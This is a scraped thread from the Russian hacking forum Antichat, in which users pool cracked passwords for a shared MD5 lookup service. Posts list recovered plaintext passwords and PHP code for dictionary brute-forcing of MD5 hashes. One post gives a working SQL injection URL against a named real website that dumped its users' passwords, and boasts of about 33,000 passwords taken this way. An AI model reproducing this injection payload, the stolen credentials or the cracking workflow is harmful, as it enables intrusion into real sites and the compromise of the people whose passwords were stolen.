ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Расшифровка хешей
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вот ещё!
  #131  
Старый 18.12.2007, 00:51
grishka
Участник форума
Регистрация: 11.08.2007
Сообщений: 220
Провел на форуме:
3736647

Репутация: 732
По умолчанию Вот ещё!

Код:
38281212
43420785
4613063
479972699
5533533
6357966
6447375
7085603
74102290
79772305
Код:
seaaes
Код:
mygoldy
вот ещё выжал
вы уж извините, терпения нет буду так выкладовать
Код:
ivrian
lad108
gnirrabl
короче каждый новый код это новые хеши)
Код:
htnebw
Код:
lilyce
blutch

Последний раз редактировалось grishka; 18.12.2007 в 02:34..
 
Ответить с цитированием

  #132  
Старый 18.12.2007, 12:05
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

может добавить функцию брутта по словарю содержащему простые пароли?
PHP код:
function brutte($hash)
{
include(
'conf.php');
$fd fopen("./dict.txt""r");
if(!
$fd)
{
 return 
"Fill 'dictionary_file' field!";
}
 else
     { 
        while(!
feof($fd))
        {
        
$pass fgets($fd);
        
$brute_hash md5($pass);
        if (
$brute_hash == $hash
            {
             
fclose($fd);
             return 
$pass;
             }
        }
        
fclose($fd);
        return 
false;
    }
 
fclose($fd);
 return 
false;

или скорость работы оставляет желать лучшего, да и нагрузка дополнительная + место под словарь нужно 6-7Гб.
Зы Щас затестю у себя на локалхосте...

Последний раз редактировалось -=lebed=-; 18.12.2007 в 12:51..
 
Ответить с цитированием

  #133  
Старый 18.12.2007, 15:12
grishka
Участник форума
Регистрация: 11.08.2007
Сообщений: 220
Провел на форуме:
3736647

Репутация: 732
По умолчанию

Код:
alkjtk
djgdog
moelee
royoyr
всё из той же базы
 
Ответить с цитированием

  #134  
Старый 18.12.2007, 16:27
DDA
Познающий
Регистрация: 02.01.2007
Сообщений: 99
Провел на форуме:
445918

Репутация: 120
По умолчанию

ilike1candy
target4321
lennocow
angellll
 
Ответить с цитированием

  #135  
Старый 18.12.2007, 23:22
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

То hilkfild:
Есть предложение хранить в базе хэши не в виде строки типа char(32) а в виде char(16) используя функции кодирования хэша (перед занесением в базу) и декодирования (после извлечения из базы)

Выгоды: уменьшение базы, быстрее поиск по базе.
Вот сами функции кодирования и декодирования:
PHP код:
function code_hash($hash)
{
$n=0;  
$hash_code="";
$l=strlen($hash)-1;
do  
 {  
  
$code='0x'.$hash[$n].$hash[$n+1];  
  
$hash_code.=chr(hexdec($code));  
  
$n++;  
 }  
while (
$n++<$l);
return 
$hash_code;

PHP код:
function decode_hash($string

$n=0;   
$decode_hash=""
$l=strlen($string)-1;
do   
 {   
  
$code=ord($string[$n]);   
  
$decode_hash.=dechex($code);   
 }   
while (
$n++<$l); 
return 
$decode_hash

ЗЫ Открываются перспективы на экономичное хранение других популярных хэшей (MySQL - char(8) против char(16), MySQL5 - char(20) против char(40), и SHA-1 - char(20) против (40). у всех чарсет 0-9a-f
Кроме того на поле pass я так понял целесообразно использовать тип VARCHAR?

Последний раз редактировалось -=lebed=-; 18.12.2007 в 23:41..
 
Ответить с цитированием

  #136  
Старый 19.12.2007, 10:27
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Уникальных паролей добавлено в базу: 12272 неуникальных паролей: 20707 спасибо.

взято от сюда:
Код:
http://63.ru/firms/index.php?cmd=show&rubid=-1+union+select+password,2+from+users+limit%2050000/*
 
Ответить с цитированием

  #137  
Старый 19.12.2007, 12:06
mouse.pro
Участник форума
Регистрация: 06.12.2006
Сообщений: 174
Провел на форуме:
1700952

Репутация: 199
Отправить сообщение для mouse.pro с помощью ICQ
По умолчанию

А как добавлять сразу множество? а не по 1-му паролю?
 
Ответить с цитированием

  #138  
Старый 19.12.2007, 12:56
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Цитата:
Сообщение от mouse.pro  
А как добавлять сразу множество? а не по 1-му паролю?
http://md5.xek.cc/wlist.php - но щас доступ запрещён, чтоб не нафлудили в базу чего лишнего...

ЗЫ Я щас делаю модернизированный сервис:
Функционал: автоматическое распознавание распространённых хэшей (пока 4: Mysql, Mysql5, md5, sha1) и поиск в базе пароля по любому из них, а так же запрос на популярные онлайн крекеры...

Последний раз редактировалось -=lebed=-; 19.12.2007 в 13:02..
 
Ответить с цитированием

  #139  
Старый 19.12.2007, 16:04
cantrabas
Новичок
Регистрация: 15.12.2007
Сообщений: 7
Провел на форуме:
17163

Репутация: 0
По умолчанию

это я ни так делаю или что?

ввожу хеш $1$Q6btAd5d$AzmLvfIjBPEn8PWaT2jKy1

а мне выдает сообщение:Неправильный формат хэш-функции
 
Ответить с цитированием

  #140  
Старый 19.12.2007, 16:14
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Эту у тебя хэш не md5

У меня предложение!!!!
Вот у вас на банере написано "Толькое реальные пароли"
предлагаю заменить на "Только чёткие пароли"
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Патчи, модификации, скрипты для John the Ripper Thanat0z Расшифровка хешей 7 15.09.2008 05:54
Crack & Key ~!DoK_tOR!~ Болталка 8 28.02.2008 10:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ